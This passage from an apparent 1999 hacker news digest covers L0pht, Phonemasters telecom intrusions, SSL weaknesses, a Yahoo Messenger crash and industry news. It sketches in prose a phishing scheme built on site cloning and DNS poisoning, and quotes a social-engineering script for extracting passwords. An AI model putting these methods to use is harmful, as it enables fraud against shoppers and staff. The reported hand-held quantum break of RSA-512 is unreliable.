occurred had nothing ever been reported. It's not enough to claim, as Weld does, that "We try to stay somewhat neutral — we're not on the vendor's side, we're not on the hacker's side. When we release the tools, they can be used for good or bad. It's up to the individuals to have morals." Mudge is currently writing a paper on a longtime hobbyhorse of his: the vulnerability of electrical power grids to hacker attacks. While the computers that control these power grids are not directly connected to the Internet, Mudge thinks a hacker could still turn out the nation's lights because utility companies have left the keys to their computers under the proverbial doormat. Mudge tells me that careless utility employees often put internal documents on public servers — perhaps to access them from home or while on the road. Sometimes, Mudge claims, the documents explain how to access the central computers. Central computers "might have no attachment to the Internet," he says, "other than the fact that somebody put up a document on the Internet describing how to get to it and how to use it." Mudge pauses. "Well, that's just as good." Mudge has written a program to scan utility companies' Web sites for words like "confidential" or "password." "I'm not breaking any laws by doing this, I'm just grabbing public stuff," he is quick to point out. "They don't realize that they're putting it up there for the world to see." He shows me a file downloaded from a large utility company that contains a presentation on company security. Next he opens a file full of phone numbers from another utility company. "It sounds almost science-fictionist," he cautions, "but with these numbers here I'd be able to turn off their entire grid." The phone numbers, he explains, connect to modems linked to the central switches that determine where electricity flows. "If I don't publish this information," Mudge claims, "someone else will come along and do the same thing, with less ethical goals. Now you can see a situation where people are dying because of these corporations' stupidity. At that point, who's to blame?" Given the stakes, Mudge intends to relax his commitment to so-called full disclosure. "It's uncool," he says, for utility companies to "learn about a problem by reading it in the newspaper." That's why he plans to alert companies in advance, so they can close vulnerabilities before the news is made public on L0pht's Web site. Like Nader, the L0pht members can get a bit preachy on the subject of ethics. "Any of us could leave L0pht right now and take six-figure jobs," Mudge says. "The fact that we don't and we're on the ramen-noodle, mac-and-cheese diet, that speaks for our ethics right there. It's not a job for us; this is what drives us through life." While Mudge's self-righteousness may be justified up to a point, there are also more prosaic reasons for working at L0pht. Freedom to do whatever you want, for instance. Silicosis and Brian Oblivion are installing a motor-driven satellite dish on the warehouse roof. They hope to capture ground-to-space communications from the Space Shuttle and high-resolution images of the earth broadcast from satellites. The justification? It's cool. Silicosis adds, "It impresses my girlfriend." Space Rogue — a sort of young Archie Bunker figure, to the extent that an Archie Bunker figure can be young — sticks closer to earth when asked how he ended up at L0pht. "I did one semester in college, said the hell with this and got out. Controlled learning environments have never been my strong point." L0pht gave him a place to pursue projects at his own pace. Mostly, Space Rogue seems to like L0pht for the camaraderie. "I moved to Boston in 1990," he says, "and I almost immediately met all these people on line on local bulletin boards. L0pht started shortly thereafter in fall '91. So I'd already known these people awhile, even face to face. The on-line world at the time was very small." Mudge recalls that the group took off when members moved their computers from their living rooms to a small loft space in Boston. (All but one of the founders, Brian Oblivion, have since left.) L0pht soon added members and moved to a larger suburban warehouse four years ago. It has also started a consulting business on the side called L0pht Heavy Industries. L0pht is not without critics, of course. "While L0pht puts on the Robin Hood mantle of fighting the big computer companies," a senior programmer at Microsoft tells me, "their only victims are the little people that are customers" — the people who purchase products like Windows 2000. Microsoft has been on the business end of several L0pht advisories, most notably when Mudge and Weld demonstrated how to decrypt passwords from computers running Microsoft's NT operating system. Jason Garms, the former head of Microsoft's security-response team, admits that hackers have a role in creating secure software. But he's wary of the Darwinian notion that hackers will, by actively looking for flaws, expose inferior products. He likens it to improving public safety by painting a target on everyone's head. I mentioned Garms's criticism to the L0pht members, who were equally dismissive. If gray-hat hackers stopped searching for vulnerabilities, L0pht believes, a black-hat hacker would find them sooner or later. It's better to get rid of flaws than hope no one finds them. The N.S.C.'s Hunker shares this belief — the hackers are already out there" — which is why he applauds L0pht for keeping vendors honest. The senior Microsoft programmer also warns that Mudge and his colleagues, for all their highfalutin apologia, are motivated mostly by naked ego: "I am certain," he says, "that the primary motivation of these people is simple self-gratification and justification." I asked the L0pht members whether ego played a part in their ethical reasoning. Weld Pond replied that, by assuming pseudonyms, they more or less deny themselves the benefits of celebrity. "When I walk down the street," he says, "no one knows I'm Weld Pond." But at Defcon, the annual hacker convention, it was quite clear that everyone knew Weld, Mudge, Space Rogue and Dildog. L0pht members have become, as Mudge notes wryly, "rock stars of the computer underground." That they help malicious hackers as well as the Feds and big business hasn't hurt their popularity among the outlaws. On the other hand, L0pht's poorly hidden hunger for the spotlight shouldn't obscure the truly fascinating work they've done. Socially important research is perfectly compatible with, and perhaps inseparable from, love of celebrity, as James Watson has made admirably clear. Say what you will, there is no denying that L0pht's advisories have improved computer security even as they have harmed corporations and government agencies. No one doubts that information security is going to become an increasingly critical topic as the ordinary economy moves into the digital age. In their grander moments, L0pht's members hope to become digital Ralph Naders, making sure that the software behind the transition is as safe as manufacturers say. The idea of eight computer hackers in a dingy warehouse insuring the safety of the information age may sound a little farfetched. But sometimes hackers eventually direct their curiosity toward laudable ends. Take, for example, the two young hackers who engineered a small blue box in the early 1970's that allowed free long-distance calls when placed near a telephone receiver. The two enterprising techies went door to door in the Berkeley dorms, selling the devices. Their names? Steve Jobs and Steve Wozniak, future founders of Apple Computer. Bruce Gottlieb was a staff writer at Slate magazine until enrolling in Harvard Law School this fall. @HWA 45.0 NO SAFETY IN NUMBERS ~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Monday 4th October 1999 on 12:05 am CET After an Israeli research institute said it could break Europe's banking codes in less than a second, a initiative has been launched that could result in unbreakable codes. The European Institute of Quantum Computing Network was founded a few weeks after news leaked from the Israel's Weizmann Institute that it was using a mixture of quantum computing and special optical technology to break the RSA-512 code, the system used by the European banking system. It claims it has developed a hand-held device that can break the code in 12 microseconds. The Sunday Times http://www.sunday-times.co.uk/news/pages/tim/99/09/29/timintint02001.html?1341861 Europe's banking codes have been cracked in the blink of an eye © End of the Enigma: Quantum Computing will spell the end of conventional encryption, such as the codes broken at Bletchley Park No safety in numbers BEN HAMMERSLEY ben.hammersley@the-times.co.uk After an Israeli research institute said it could break Europe's banking codes in less than a second, a initiative has been launched that could result in unbreakable codes. The European Institute of Quantum Computing Network was launched on Monday, to bring companies and research labs throughout Europe together in the hope that the new technology - Quantum Computing - can be taken from the theory to the high street. The institute was founded a few weeks after news leaked from the Israel's Weizmann Institute that it was using a mixture of quantum computing and special optical technology to break the RSA-512 code, the system used by the European banking system. It claims it has developed a hand-held device that can break the code in 12 microseconds. Quantum computing works by taking advantage of the peculiar characteristics of subatomic particles. Whereas a normal computer relies on a signal - or bit - being either on or off, a quantum bit can be both on and off at the same time. This unusual ability means a great deal more information can be stored. While a regular computer works through each sum one at a time, a quantum computer can do every operation at the same time. This, the EIQC says, offers, "not just incremental improvements, but a fundamental breakthrough" in computing power - enough for code-breaking, voice-recognition and translating computers to be simple to build. The second aspect of Quantum computing, however, will help to make information more secure. Using a feature called "quantum entanglement", information could be sent between two computers that could not be eavesdropped upon without the two computers' knowledge. Because quantum physics dictates that monitoring a subatomic particle changes its state; not only would an eavesdropper announce his presence, but the message would be garbled. "A hacker wouldn't know where to start," says Jonathan Curtis of Quantum Electronic Devices. As one member of EIQC, who wished to remain anonymous, predicts: "While quantum computers may be some time off, when they are available no communication will be secure unless it is quantum." @HWA 46.0 YAHOO! MESSENGER DoS ~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Sunday 3rd October 1999 on 5:01 pm CET A denial of service attack exists in build 733 of Yahoo! Messenger. The vulnerability exists when Messenger leaves port 5010 open. When a connection is made on port 5010, Messenger crashes. The connection stays open until the user closes the program. Team Asylum Security found that hole and informed Yahoo! of it. They have released build 734. Yahoo! Messenger (Build 734) still has port 5010 open but will not crash if connections are made unto it. http://www.team-asylum.com @HWA 47.0 PROBLEM IN MCF40.DLL ~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by BHZ, Sunday 3rd October 1999 on 4:35 pm CET Microsoft informs us of a problem in MfC40.dll. An internal function within Mfc40.dll is designed to add 1900 to every 2-digit date that is passed to it. For example, 99 is returned as 1999. If more than 2 digits are passed, nothing is added. Programs that use this function may incorrectly parse a date after the year 2000. Solutions here. http://support.microsoft.com/support/kb/articles/Q152/7/34.ASP @HWA 48.0 US AIMS TO FIGHT ATTACKS ON FINANCIAL SYSTEMS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Saturday 2nd October 1999 on 3:45 pm CET The U.S. Treasury Department on Friday opened a center intended to help the financial services industry and the government share information about cyber attacks and threats. The Financial Services Information Sharing and Analysis Center was formed following a directive from President Clinton that the Treasury Department work with the banking and finance sectors to find ways to improve security of information systems, according to a written statement issued Friday from the department. Read more http://www.infoworld.com/cgi-bin/displayStory.pl?99101.entreasury.htm U.S. aims to fight attacks on financial systems By Nancy Weil InfoWorld Electric Posted at 12:00 PM PT, Oct 1, 1999 The U.S. Treasury Department on Friday opened a center intended to help the financial services industry and the government share information about cyber attacks and threats. The Financial Services Information Sharing and Analysis Center was formed following a directive from President Clinton that the Treasury Department work with the banking and finance sectors to find ways to improve security of information systems, according to a written statement issued Friday from the department. The center was officially announced by U.S. Treasury Secretary Lawrence Summers and is being supported by the U.S. Securities and Exchange Commission and the Federal Reserve Board. A dozen financial services companies have said they are interested in participating in the center, according to the statement. "When I first joined the Treasury some years ago, I can assure you we were not thinking about threats to the financial system emanating from viruses, Trojan horses, logic bombs, or malicious code," Summers said in a prepared statement delivered when he announced the center Friday morning. "But we are thinking about those things now, and with good reason." The pervasive use of the Internet by individuals and financial institutions has led to new needs when it comes to security, he said. A study last year by the Computer Security Institute found that among companies polled, 64 percent had information system security breaches, up 16 percent over 1997, he added. The total financial loss from the breaches rose 36 percent in a year. "As damaging as these attacks have been, the vast majority has been conducted by disgruntled individuals," Summers said in his written remarks. "We face a future, though, where criminals, terrorists or even nation-states may use the same tools in a more organized way for darker purposes." The new center, Summers said, "can play a key role in bolstering the confidence of the American public in the security and stability of our financial system" by enabling the financial industry and the government to share details about cyber attacks and how to quell them. Additional information about the center had not been posted on the Treasury Department Web site as of Friday afternoon. The department, in Washington, can be reached at www.ustreas.gov. Nancy Weil is a correspondent in the Boston bureau of the IDG News Service, an InfoWorld affiliate. @HWA 49.0 DIGITALBOND ON SSL ~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Saturday 2nd October 1999 on 3:35 pm CET SecuritPortal did an interview with Dale Peterson of DigitalBond, the company which last week went public with some of the major problems in SSL, showing that this isn't that secure either. The article also describes the actual workings of their attack on the Secure Sockets Layer system. Read it here. http://securityportal.com/direct.cgi?/closet/closet19990930.html Special Kurt's Closet: Is SSL dead? Kurt Seifried, seifried@seifried.org, for http://www.securityportal.com/ September 30, 1999 - The title is a bit scary, but I wanted to get your attention (worked, didn't it?). Most security experts have been aware of problems with SSL, but generally speaking we haven't said much because there wasn't much of a replacement available for it, and it hasn't been exploited extensively (chances are it will be, though). I'll start with an explanation of the basic attack, followed by some methods to protect yourself, and finish with an interview with Dale Peterson of DigitalBond and the summary. How to do it Let's say I want to scam people's credit card numbers, and don't want to break into a server. What if I could get people to come to me, and voluntarily give me their credit card numbers? Well, this is entirely too easy. I would start by setting up a web server, and copying a popular site to it, say www.some-online-store.com, time required to do this with a tool such as wget is around 20-30 minutes. I would then modify the forms used to submit information and make sure they pointed to my server, so I now have a copy of www.some-online-store.com that looks and feels like the "real" thing. Now, how do I get people to come to it? Well I simply poison their DNS caches with my information, so instead of www.some-online-store.com pointing to 1.2.3.4, I would point it to my server at 5.6.7.8. Now when people go to www.some-online-store.com they end up at my site, which looks just like the real one. How to prevent being taken Most forms online are not on secure servers, but the data you provide is usually sent to a secure server, which leads to one of the major problems. The form data may not be going where it should. A simple attack is to have the fake site, and a form that takes the data, without using a secure server at all. How many of you actively check the source HTML of pages you are plugging your credit card data into? The title bar should start with https:// followed by the sitename (i.e.: https://www.microsoft.com/). You should also examine the HTML source to make sure the form data points to where it should go, you should see something like:
or: If a store is using the "GET" method, do not buy from them, any data you enter will be passed along as the query string, if you look in the text of your address bar you will see your credit card info. If a store specifies a relative link (i.e.: /something/something.cgi) then make sure the current site you are at is a secure server, and that the certificate is legitimate. If the link is absolute, and points to an IP address, be suspicious, I personally would not buy if this were the case. Ideally the link should point to something like "https://www.some-online-store.com/cgi-bin/order.cgi", and you should first browse to that site, and make sure the certificate is legitimate, before hitting the submit button on your order form. Most current SSL attacks are based on fooling the user, more so than breaking the technology. If you are vigilant, and check certificates before you submit to sites you will be a little safer (but not completely). SSL Certificates contain various pieces of information, such as who issued them, when it was issued, when it expires, who it was issued to and so forth. Who it was issued to (usually the "subject") is a very important field, and the issuer field. To view the certificate details double click on the lock icon, usually at the bottom left of the screen in Netscape, and at the bottom right in Microsoft Internet Explorer. Let's take https://www.microsoft.com/ for example, the Issuer field looks like: OU = Secure Server Certification Authority O = RSA Data Security, Inc. C = US The C stands for country, the O for organization (usually the company's name), and the OU stands for organizational unit (a division of the company). The subject field looks like: CN = www.microsoft.com OU = mscom O = Microsoft L = Redmond S = Washington C = US The S stands for state, the L for locality (the city), and the CN is the certificate name (the site it applies to). Make sure all these are spelt correctly, many attackers will use domain names that look familiar (such as miicrosoft.com) in order to get legitimate certificates. Taking these precautions every time you use an SSL secured service is tedious, and underlines one of the major flaws with SSL, in that is susceptible to "social engineering" attacks. Another flaw in SSL is that it only secures the session, it doesn't secure any actually transaction. This means if someone does steal your credit card number and use it online, it is almost impossible to prove that it wasn't actually you that issued the order. SSL does allow for the client to authenticate to the server, however very few people have digital certificates compatible with this (I have one, and know of perhaps a half dozen other people, a definite minority). In addition to this the major certificate vendors have stopped issuing the personal certificates that guarantee the person's identity, so they are a dead end. There are newer protocols and systems that allow for two parties to safely conduct transactions with all these features. The following is an interview with Dale Peterson of DigitalBond (www.digitalbond.com). DigitalBond is currently working on a product to secure Internet transactions, and is targeted at brokerage houses which have many thousands of users on a daily basis, making them an especially tempting target. Kurt: Is SSL dead? Dale: No. It is a fine session encryption protocol. The editor for the TLS (new name for latest version of SSL) spec works at Certicom and is our partner. I've talked this over with him, and he is very insistent that SSL is not broken. But he does say it suffers from all the problems we have discussed in these emails and could be augmented with a transaction protocol. I think that it certainly shouldn't be the protocol for most e-commerce transactions, but for the exchange of private data over the Internet it is ok. Kurt: What do you envision replacing SSL? Dale: We see a lot of businesses that are doing two-party transactions. Nice and simple, unlike the multi-party bank card model that SET addresses. We have developed a two-party transaction security model that we thinks meets the needs of Internet Brokerages, Internet prescription drugs, and other two-party transactions. It is being reviewed by Carnegie Mellon University, and they will publish a paper this year. Kurt: Should we be educating users about these technologies? Do they care? Dale: The most important education needed is that SSL transactions are not secure. The whole Internet community has been fed this baloney because SSL was around and easy. I have found it difficult getting reporters to even believe this vulnerability exists, even with a live demo. The response is "That can't be true. We would all know about this if that were true". That is why I think this story will be big when it breaks in the mainstream press. Summary: SSL is NOT dead. It is just an inappropriate security system for many Internet based transaction systems. As with many things on the Internet the growth of online sales, and especially the growth of online brokerages has been stupendous. SSL was simply not designed with systems like these in mind, and systems like DigitalBond are attempting to fix this. Chances are in 5 to 10 years that the existing systems will be found to be "weak", and replaced with better systems. Kurt Seifried is a security analyst and the author of the "Linux Administrators Security Guide", a source of natural fiber and Linux security, part of a complete breakfast. Related links: http://www.digitalbond.com/ http://developer.netscape.com/tech/security/ssl/howitworks.html http://developer.netscape.com/docs/manuals/security/sslin/index.htm @HWA 50.0 THE FUTURE OF AV COMPANIES ~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Saturday 2nd October 1999 on 3:10 pm CET Soon, every user will get free virus detection software over the Internet. So what does this future hold for anti-virus companies? "In the future it won't be about protecting computers against viruses, but content security", says security firm ICCA. But it's all about the updates, according to Symantec. Full story http://www.zdnet.com/zdnn/stories/news/0,4586,2346360,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Virus protectors get a brand new bag By Robert Lemos, ZDNN October 1, 1999 4:18 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2346360,00.html VANCOUVER, Canada -- Anti-virus software is quickly going the way of the browser -- soon to be free and ubiquitous, said industry insiders Friday at the Virus Bulletin99 conference. Soon, every user will get free detection software, with security firms selling updates via the Internet at a monthly fee. Anti-virus services will also be sold to Internet Service Providers for resale to users. "In the future it won't be about protecting computers against viruses, but content security," said Larry Bridwell, program technology manager for security firm International Computer Security Association. With the number of threats against computers increasing -- viruses, hackers, privacy-invading companies, and good old-fashioned bugs, to name a few -- keeping content safe and the computer running is now Job No.1. Consumers' desire for a single fix-it package is changing the economics of the industry, admitted Carey Nachenberg, chief scientist for the Symantec Anti-virus Research Center. "We're all afraid the retail channel will dry up," he said. Viruses with sneakers An even more important factor: Viruses infecting computers via e-mail move far too quickly for companies to rely on manual updates to their software. Last spring, for example, the Melissa virus infected hundreds of thousands of computers within 48 hours. "We're at a turning point right now," said Nachenberg in a keynote speech Thursday. "We need to re-examine our anti-virus software, and companies need to re-examine their anti-virus strategies." Symantec (Nasdaq:SYMC) is taking a two-pronged approach to the problem. With partner IBM Corp. (NYSE:IBM), the anti-virus software maker is nearing completion of its "Digital Immune System." The technology automatically updates all subscribers over the Internet with virus recognition patterns whenever one of those computers encounters a new virus. Fixes for a new virus can be disseminated to all the machines on the network within as little as 30 minutes of encountering the first virus. The speed of the Internet, which viruses use to spread quickly, can now be used to get the cure out just as fast. "As we distribute information faster and more broadly, we have to be careful," said Steve White, senior manager of IBM's Massively Distributed Systems Research Division, who helped design the new Digital Immune System service. "It becomes much easier to get viruses over the Internet." Firewall for the home Symantec is also preparing to package its anti-virus software into a single integrated security suite that will give home users a firewall, Internet filtering software and anti-virus utilities, said Symantec engineers at the show. The product will be released later this month. But even that stand-alone product will eventually be connected to the Digital Immune System service, providing virus updates extremely quickly. "The whole industry is going toward automatic fixes and automatic updates," said IBM's White. "The anti-virus vendors are just adopting it faster." Symantec's rivals are working on similar strategies. "A lot of the basis of value of a stand-alone product in the home is going away," said Crag Kensek, director of product marketing for anti-virus firm Trend Micro Inc. "For the non-technical home user, it's like insurance." Trend announced in September its new eDoctor strategy, which allows ISPs to protect their customers from viruses by scanning each file downloaded from the Internet. U S West (NYSE:USW) and Sprint Communications Corp. (NYSE:FON) have signed on to the service. Virus reporting valuable Rival security software firm Network Associates Inc. (Nasdaq:NETA) plans to release a similar technology to Symantec's called the AutoImmune System, early next year, its engineers said. While finding and fixing viruses faster has captured the interest of corporate network administrators, an automated system's ability to collect data on the number of virus incidents is equally valuable, said one administrator at the conference, who asked to remain anonymous. Currently, the best source of such data is the Wildlist, and even that volunteer site would like to see better and more accurate statistics, said Sarah Gordon, one of the directors of the independently maintained Wildlist. "It would be extremely useful to get reports from these systems," she said. "We intend to pursue that in the future." @HWA 51.0 UNPLUGGING THE "PHONEMASTERS" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Help Net Security http://www.net-security.org/ by Thejian, Saturday 2nd October 1999 on 2:55 pm CET ZDNet has a story on the "ring of hackers" calling themselves the Phonemasters, who gained access to the telephone networks of companies as AT&T, British Telecom, MCI Worldcom etc and on how they were tracked and busted by FBI agents. http://www.zdnet.com/zdnn/stories/news/0,4586,2345639,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Unplugged! The biggest hack in history By John Simons, WSJ Interactive Edition October 1, 1999 8:54 AM PT URL: http://www.newslinx.com/ DALLAS -- In a federal courtroom here, Calvin Cantrell stands silently, broad shoulders slouched. His lawyer reads from a short letter he has written: "My parents taught me good ethics, but I have departed from some of these, lost my way sometimes," the letter states. "I was 25 and living at home. No job, and no future... . All I ever really wanted was to work with computers." Cantrell certainly did work with computers -- both his own, and, surreptitiously, those of some of the largest companies in the world. He was part of a ring of hackers that pleaded guilty here to the most extensive illegal breach of the nation's telecommunications infrastructure in high-tech history. And sitting behind him in court as he was sentenced two weeks ago was the accountant-turned-detective who caught him: Michael Morris. A decade earlier, Morris, bored with accounting work, left a $96,000 job at Price Waterhouse and enrolled in the FBI academy, at $24,500 a year. Cantrell's sentencing was the final act in a five-year drama for Morris, and secured his reputation as the FBI's leading computer gumshoe. The tale of Morris and Cantrell is among the first cops-and-robber stories of the New Economy, involving, among other things, the first-ever use of an FBI "data tap." It illustrates how the nation's law-enforcement agencies are scrambling to reinvent their profession in a frantic effort to keep pace with brilliant and restless young hackers. Unlimited potential for harm The story also shows that hacking's potential harm is far more ominous than theft of telephone credit-card numbers. Cantrell was part of an eleven-member group dubbed "The Phonemasters" by the FBI. They were all technically adept twentysomethings expert at manipulating computers that route telephone calls. The hackers had gained access to telephone networks of companies including AT&T Corp., British Telecommunications Inc., GTE Corp., MCI WorldCom (then MCI Communications Corp.), Southwestern Bell, and Sprint Corp. They broke into credit-reporting databases belonging to Equifax Inc. and TRW Inc. They entered Nexis/Lexis databases and systems of Dun & Bradstreet, court records show. The breadth of their monkey-wrenching was staggering; at various times, they could eavesdrop on phone calls, compromise secure databases, and redirect communications at will. They had access to portions of the national power grid, air-traffic-control systems and had hacked their way into a digital cache of unpublished telephone numbers at the White House. The FBI alleges, in evidence filed in U.S. District Court for the Northern District of Texas, that the Phonemasters had even conspired to break into the FBI's own National Crime Information Center. Unlike less-polished hackers, they often worked in stealth, and avoided bragging about their exploits. Their ultimate goal was not just fun, but profit. Some of the young men, says the FBI, were in the business of selling the credit reports, criminal records, and other data they pilfered from databases. Their customers included private investigators, so-called information brokers and -- by way of middlemen -- the Sicilian Mafia. According to FBI estimates, the gang accounted for about $1.85 million in business losses. "They could have -- temporarily at least -- crippled the national phone network. What scares me the most is that these guys, if they had had a handler, whether criminal or state-sponsored, could have done a lot of damage," says Morris. "They must have felt like cyber gods." Some may be still at large With the exception of Cantrell, none of the defendants in the Phonemasters case would comment on the matter. Others are thought to remain at large. This is the story of Cantrell and two accomplices largely put together from federal district court records and FBI interviews. Morris first learned of the group in August 1994, when he got a phone call from a Dallas private investigator, saying Cantrell had offered to sell him personal data on anyone he wished. He even offered a price list: Personal credit reports were $75; state motor-vehicle records, $25; records from the FBI's Crime Information Center, $100. On the menu for $500: the address or phone number of any "celebrity/important person." Morris immediately opened an investigation. Only 33-years-old at the time, he had taken an annual pay cut to join the FBI just five years earlier. He had been a tax consultant at Price Waterhouse, and despised the work. "I was young and making the big bucks, but every morning I would think 'God, I don't want to go to work.' " Tall, square-jawed and mustachioed, Morris began working on white-collar crimes when he arrived at the Dallas FBI field office. He took on a few hacker cases and realized he liked the challenge. "These guys are not the kind who'll rob the convenience store then stare right into the security camera," he says. "Trying to be the Sherlock Holmes of the Internet is hard when the fingerprints on the window can be so easily erased." Morris convinced the private investigator to meet with Cantrell while wearing an audio taping device. After reviewing the tapes, he was certain that he was onto something big. He applied for and received court authority to place a digital number recorder on Cantrell's phone lines, which would log numbers of all outgoing calls. It showed that Cantrell frequently dialed corporate telephone numbers for AT&T, GTE, MCI, Southwestern Bell and Sprint. Cantrell had also placed calls to two unlisted numbers at the White House, which further piqued Morris's interest. So, late that summer, Morris took an unprecedented step. He began writing a 40-page letter to the FBI's Washington headquarters, the Department of Justice and the federal district court in Dallas. Recording Cantrell -- now his central suspect -- while on the phone wasn't sufficient for the job that faced him, he believed. Instead, he needed new federal powers. He asked for Washington's permission to intercept the impulses that traveled along Cantrell's phone line as he was using his computer and modem. "It's one of the hardest techniques to get approved, partly because it's so intrusive," says Morris, who spent the next month or so consulting with federal authorities. "The public citizen in me appreciates that," he says. Still, the long wait was frustrating. "It took a lot of educating federal attorneys," he says. Once authorities said yes, Morris faced another obstacle: The equipment he needed didn't exist within the FBI. Federal investigators had experimented with a so-called data-intercept device only once before in a New York hacker case a year earlier. It had failed miserably. Morris and technicians at the FBI's engineering lab in Quantico, Va., worked together to draft the specifications for the device Morris wanted. It would need to do the reverse of what a computer's modem does. A modem takes digital data from a computer and translates it to analog signals that can be sent via phone lines. Morris's device would intercept the analog signals on Cantrell's phone line and convert those impulses back to digital signals so the FBI's computers could capture and record each of a suspect's keystrokes. Alerting the victims While waiting for the FBI to fit him with the proper gear, Morris contacted several of the telephone companies to alert them that they had been victimized. The reception he got wasn't always warm. "It's kind of sad. Some of the companies, when you told them they'd had an intrusion, would actually argue with you," he said. GTE was an exception. Morris discovered that Bill Oswald, a GTE corporate investigator, had opened his own Phonemasters probe. Oswald and Morris began working together and uncovered another of Cantrell's schemes: He and some friends had managed to get their hands on some telephone numbers for FBI field offices. They entered the telephone system and forwarded some of those FBI telephones to phone-sex chat lines in Germany, Moldavia and Hong Kong. As a result of the prank, the FBI was billed for about $200,000 in illegal calls. Morris also learned that on Oct. 11, 1994, Cantrell hacked GTE's computer telephone "switch" in Monticeto, Calif., created a fake telephone number and forwarded calls for that number to a sex-chat line in Germany. The FBI isn't sure how Cantrell convinced people to call the number, but court records show that Cantrell received a payment of $2,200 from someone in Germany in exchange for generating call traffic to the phone-sex service. In early December 1994, Morris's "analog data-intercept device" finally arrived from the FBI's engineering department. It was a $70,000 prototype that Morris calls "the magic box." On Dec. 20, Morris and other agents opened up their surveillance in an unheated warehouse with a leaky roof. The location was ideal because it sat between Cantrell's home and the nearest telephone central office. Morris and nine other agents took turns overseeing the wiretap and data intercepts. The agents often had to pull a tarp over their workspace to keep rain from damaging the costly equipment.As middle-class families go, the Cantrells seem exemplary. Calvin's father, Roy, was a retired detective who had once been voted "Policeman of the Year" in Grand Prairie, the suburb west of Dallas where they live. His mother, Carol, taught Latin and English at Grand Prairie High School, where Calvin graduated in 1987 with above-average grades. As a student, he was no recluse. He had a small circle of friends who shared his love of martial arts, video games and spy movies. Cantrell's longtime friend, Brandon McWhorter, says Calvin was always a fun-loving guy, but there was one thing about which he was very serious. "He would always talk to me about religion," McWhorter says. "He held very strong religious beliefs." After high school, Cantrell continued to live at home while taking classes at the University of Texas at Arlington and a local community college. He held a series of odd jobs and hired himself out as a deejay for weddings and corporate parties. Cantrell balanced, school, work, family and friends even as he began hacking more often. His parents became suspicious, but said nothing. The family had three phones; Calvin stayed on his 15 hours a day. "They'd go in my room and see all the notes and the phone numbers. Even though they couldn't put it together technically, they knew something was up," says Cantrell. "They were kind of in denial... . My parents were pretty soft." Mrs. Cantrell says Calvin had been so well-behaved that she never suspected his computer activities were more than fun and games. "I wish I had known what was going on. Unfortunately, my son was smarter than I was." (Calvin's father passed away last year.) The hack At 8:45 on the night of Dec. 21, just four days before Christmas, Cantrell went online. Using an ill-gotten password, he entered a Sprint computer, where he raided a database, copying more than 850 calling-card access codes and other files, court records in the case show. The Phonemasters often got passwords and other key information on companies in a low-tech approach called "Dumpster diving," raiding the trash bins of area phone firms for old technical manuals, phone directories and other company papers. This often allowed Cantrell to run one of his favorite ruses -- passing himself off as a company insider. "I'd call up and say, 'Hi, I'm Bill Edwards with systems administration.' ... I'd chat with them for a while, then I'd say 'We're doing some network checkups today. Can you log off of your computer, then tell me every character you're typing as you log back on?' A lot of people fell for that," Cantrell says. After hacking into the Sprint database that evening, Cantrell talked to another hacker, Corey Lindsley, over the phone. He'd "met" Lindsley, and another hacker, John Bosanac, in 1993 while surfing the murky world of hacker bulletin boards. Cantrell then sent the copied files to Lindsley, who was a student at the University of Pennsylvania in Philadelphia. Morris's equipment captured everything -- voice and data. It was an FBI first. "We're sitting in this place that looked liked a bomb pit, but the atmosphere was really exciting," says Morris. "We were ecstatic." As the days passed, the FBI wiretap generated stacks upon stacks of audiotapes and data transcripts. Some was just idle talk among friends, the occasional call to finalize dinner plans, lots of workaday chatter. But the incriminating evidence mounted. "It's great, you know. I really love fraud," joked Bosanac, a Californian who was musing with Cantrell about the various technical methods of using other people's cellular telephone accounts to place free calls. "Fraud is a beautiful thing." Family conversations even entered the investigation. On Jan. 7, for instance, Cantrell called his mother from a friend's house and asked her find an MCI manual on his shelf. He then asked her to read him a set of directions for accessing MCI's V-NET computer system. Mrs. Cantrell read the material but asked her son whether he was supposed to have the book, citing warnings that stated its contents were restricted to MCI employees. Cantrell just avoided his mother's question. The FBI data-tap captured every word. Taking a toll Still, the process took its toll on the FBI team, especially coming during the holidays. "It was stressful that the wiretap was going 24 hours a day, seven days a week. I had to write up the legal documents, and it's tough making people work through Christmas," Morris said. On top of that, he had to keep records of his findings, and every 10 days he had to reapply to the court to prove that his wiretap was yielding evidence. By late January, the FBI had begun to get a clear profile of Cantrell and his hacker friends. Lindsley, it appeared, was the group's acerbic leader, directing much of the hacking activity. Over phone lines, the FBI heard him bragging about how he had given a Pennsylvania police department "the pager treatment" in retaliation for a speeding ticket he received. Lindsley had caused the police department's telephone number to appear on thousands of pagers across the country. The resulting flood of incoming calls, Lindsley bragged, would surely crash the department's phone system. They also enjoyed collecting information about film stars, musicians and other famous people. Cantrell has admitted that he broke into President Clinton's mother's telephone billing records in Arkansas to obtain a list of unpublished White House numbers. The men, says the FBI, even made harassing phone calls to rock star Courtney Love and former child actor Danny Bonaduce using pilfered numbers. They weren't without fear of getting caught. On the evening of Jan. 17, for instance, there was a clicking on the phone line as Bosanac, Cantrell, and Lindsley shared a three-way conference call. "What the hell happened?" asked Bosanac, according to an FBI transcript of the conversation. "That was the FBI tapping in," laughed Cantrell. "Do you know how ironic that's gonna be when they play those tapes in court?" Lindsley said. "When they play that tape in court and they got you saying it was the FBI tapping in?"On Jan. 18, the FBI overheard Cantrell, Bosanac and Lindsley on another conference call. With the other two men giving directions, Cantrell dialed his computer into Southwestern Bell's network and copied a database of unlisted phone numbers. The three men then discussed plans to write a computer program that could automatically download access codes and calling-card numbers from various telephone systems. They also talked about the chance that the FBI would one day track them down. "Just remember, nobody f-- rats anybody out," said Lindsley to the others. "No deals." "Yeah, no deals is right," replied Bosanac. "No deals. I'm serious. I don't care what your f-- lawyers tell you," said Lindsley. Cantrell said nothing. Transferred codes to Canada Later that morning, between 5:09 and 7:36, Cantrell entered 